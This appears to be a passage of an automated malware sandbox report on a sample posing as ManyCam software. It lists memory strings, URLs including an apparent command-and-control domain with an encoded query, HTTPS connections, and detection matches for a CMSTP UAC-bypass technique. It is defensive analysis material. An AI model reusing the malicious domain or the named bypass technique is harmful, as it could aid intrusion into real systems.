                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                  Source: ManyCam.exe, 00000001.00000002.1717306561.000000000490D000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.000000000442F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.00000000055DA000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.00000000025F1000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.0000000004419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                  Source: ManyCam.exe, ManyCam.exe, 00000003.00000000.1714817804.00000000005A4000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2147384434.00000000005A4000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://www.manycam.com
                  Source: ManyCam.exe, ManyCam.exe, 00000003.00000000.1714817804.00000000005A4000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2147384434.00000000005A4000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://www.manycam.com/codec
                  Source: file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://www.manycam.com/codecVerdanaThis
                  Source: file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://www.manycam.com/codecVerdanaTo
                  Source: file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://www.manycam.com/help/effects/snapshot/these
                  Source: file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000003.1710918732.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000003.1706209188.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000003.1706834191.0000000000CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.manycam.com0
                  Source: ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://www.manycam.comhttp://manycam.com/feedback/?version=%sAnchor
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000000.2000003324.00000001401E0000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2379403230.00000001401F4000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com/?Download=Find.Same.Images.OK
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2379403230.00000001401F4000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2379403230.00000001401F4000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2379403230.00000001401F4000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000000.2000003324.00000001401E0000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2379403230.00000001401F4000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de/?Download=Find.Same.Images.OK
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2379403230.00000001401F4000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2379403230.00000001401F4000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2379403230.00000001401F4000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0
                  Source: Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.surfok.de/
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                  Source: Rzu_channel_debug.exe, 0000000B.00000003.2331116179.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2359786629.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2343858401.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2370658720.0000000000485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website/
                  Source: Rzu_channel_debug.exe, 0000000B.00000003.2283066654.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2331116179.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2370658720.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2320487418.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2309495951.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2359786629.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2272868678.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2342963938.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2270513933.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2343858401.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2370328312.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2283242007.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website/OIDH
                  Source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website/Scoreboard-10-2.html
                  Source: Rzu_channel_debug.exe, 0000000B.00000003.2370328312.0000000000454000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2309309798.0000000000474000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website/Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT
                  Source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website/Scoreboard-10-2.htmltaPM
                  Source: Rzu_channel_debug.exe, 0000000B.00000003.2370328312.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2342963938.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2331116179.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2343858401.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2370658720.0000000000485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website/True
                  Source: Rzu_channel_debug.exe, 0000000B.00000003.2370328312.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2370658720.0000000000485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website/TrueCCU
                  Source: Rzu_channel_debug.exe, 0000000B.00000002.2370571330.0000000000436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website/U
                  Source: Rzu_channel_debug.exe, 0000000B.00000003.2370328312.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2370658720.0000000000485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website/UHx50n0S5FCP
                  Source: Rzu_channel_debug.exe, 0000000B.00000003.2309309798.0000000000485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website/aCw
                  Source: Rzu_channel_debug.exe, 0000000B.00000003.2270513933.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2283066654.0000000000485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website/dcigkldape
                  Source: Rzu_channel_debug.exe, 0000000B.00000003.2283066654.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2331116179.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2370658720.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2320487418.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2309495951.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2359786629.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2272868678.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2342963938.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2270513933.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2343858401.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2370328312.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2283242007.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website/icy
                  Source: Rzu_channel_debug.exe, 0000000B.00000003.2320487418.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2342963938.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2331116179.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2359786629.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2343858401.0000000000485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website/kphmmid
                  Source: Rzu_channel_debug.exe, 0000000B.00000003.2320487418.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2309309798.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2270513933.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2283066654.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2331116179.0000000000485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website/mapbhaebnd
                  Source: Rzu_channel_debug.exe, 0000000B.00000003.2320487418.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2309309798.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2342963938.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2343858401.0000000000485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website/rCd
                  Source: Rzu_channel_debug.exe, 0000000B.00000003.2320487418.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2309309798.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2331116179.0000000000485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website:443
                  Source: Rzu_channel_debug.exe, 0000000B.00000003.2320636388.00000000004ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website:443/Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1P
                  Source: Rzu_channel_debug.exe, 0000000B.00000003.2283066654.0000000000485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nocaryesmoto1.website:443s_z
                  Source: Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D9F000.00000004.00001000.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D98000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                  Source: Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D9F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                  Source: Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D98000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                  Source: Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D9F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D9F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D9F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D9F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: Rzu_channel_debug.exe, 0000000B.00000002.2377933999.0000000007D9F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49747 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49758 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49769 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49775 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49781 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49787 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49798 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49946 version: TLS 1.2

                  System Summary

                  barindex
                  Source: 14.2.cmd.exe.2b207f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 14.2.cmd.exe.29f4a08.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 23.2.Rzu_channel_debug.exe.2707a20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.cmd.exe.5629a00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 23.2.Rzu_channel_debug.exe.274d6ed.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 21.2.cmd.exe.56b1acd.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 21.2.cmd.exe.566ca00.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 14.2.cmd.exe.4b11acd.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.cmd.exe.566eacd.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 11.2.Rzu_channel_debug.exe.2640a20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 11.2.Rzu_channel_debug.exe.26866ed.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 11.2.Rzu_channel_debug.exe.2685aed.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.cmd.exe.566f6cd.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 23.2.Rzu_channel_debug.exe.274caed.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
